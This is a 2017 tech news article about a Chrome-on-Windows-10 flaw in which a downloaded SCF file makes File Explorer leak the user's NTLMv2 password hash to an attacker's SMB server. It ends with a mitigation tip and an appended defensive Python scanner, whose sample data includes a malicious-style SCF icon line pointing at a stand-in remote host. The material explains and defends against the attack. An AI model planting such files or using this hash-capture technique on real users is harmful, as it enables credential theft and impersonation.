Hackers could use Chrome on Windows 10 to steal passwords – Google is working on a fix

Published on May 17, 2017


Given the recent Google discovery of a flaw in Windows Defender, and the Google discovery of a flaw in Internet Explorer and Edge, it would appear that Google and Microsoft aren’t exactly friendly when it comes to working together. This time, however, a new flaw has been discovered for which both tech giants could perhaps be to blame: hackers can exploit it to use Chrome on Windows 10 to steal passwords (via ZDNet).

While Google has said it is working on a fix for this flaw, DefenseCode security researcher Bosko Stankovic recently detailed how the flaw could trick the latest version of Chrome on Windows 10 into downloading an SCF file (show desktop icon shortcut) that can trick Windows into giving up a user’s LAN Manager (NTLMv2) password hash to hackers.

Once downloaded, the request is triggered the very moment the download directory is opened in Windows File Explorer to view the file, delete it or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the “icon”. The remote SMB server set up by the attacker is ready to capture the victim’s username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password.

Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his web site to be able to proceed and reuse victim’s authentication credentials. Even if the victim is not a privileged user (for example, an administrator), such vulnerability could pose a significant threat to large organisations as it enables the attacker to impersonate members of the organisation. Such an attacker could immediately reuse gained privileges to further escalate access and perform attacks on other users or gain access and control of IT resources.

The root of this flaw is the way in which Chrome and Windows handle SCF files. Chrome does not label these types of files as malicious and does not scan them for malicious intent, and it relies on the default Windows settings once the file is downloaded. Because of this, the user does not even need to click or open the file: Windows Explorer will automatically try to retrieve the icon when the user goes into the download directory, which lets the attacker capture the LAN Manager (NTLMv2) password hash.

To protect yourself, go to Chrome’s Settings > Show advanced settings and check the “Ask where to save each file before downloading” option.
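A defensive check for the behaviour described above, as an added example that is not part of the original article: it scans a directory such as Downloads for .scf files whose icon points at a network (UNC) path. The `IconFile` key name comes from the SCF file format rather than from this article, and the sample file contents and the host `files.example.test` are constructed.

```python
import re
import sys
from pathlib import Path

# IconFile is the SCF key Explorer reads to locate the icon (taken from the
# SCF format itself, not from the article). A value that starts with two
# slashes or backslashes is treated as a UNC path, i.e. a fetch over SMB.
ICON_RE = re.compile(r"^\s*IconFile\s*=\s*(.+?)\s*$", re.IGNORECASE | re.MULTILINE)
UNC_RE = re.compile(r"^[\\/]{2}([^\\/]+)")


def remote_icon_host(scf_text):
    """Return the host an SCF file's icon would be fetched from, or None."""
    for value in ICON_RE.findall(scf_text):
        match = UNC_RE.match(value.strip('"'))
        if match:
            return match.group(1)
    return None


def decode(raw):
    """SCF files are plain text; honour a UTF-16 BOM, else read as Latin-1."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("latin-1")


def scan_directory(directory):
    """Yield (path, host) for every .scf file whose icon is on a remote host."""
    for path in Path(directory).iterdir():
        if path.is_file() and path.suffix.lower() == ".scf":
            host = remote_icon_host(decode(path.read_bytes()))
            if host:
                yield path, host


# Constructed samples: a local icon (not flagged) and a UNC icon (flagged).
SAMPLE_LOCAL = "[Shell]\nCommand=2\nIconFile=explorer.exe,3\n"
SAMPLE_REMOTE = (
    "[Shell]\r\nCommand=2\r\nIconFile=\\\\files.example.test\\share\\icon.ico\r\n"
)

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for scf_path, scf_host in scan_directory(target):
        print(f"{scf_path}: icon would be fetched from {scf_host}")
```

Pass the directory to scan as the first argument; a hit is a file to delete without relying on Explorer's preview of it.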

Radu Tyrsina
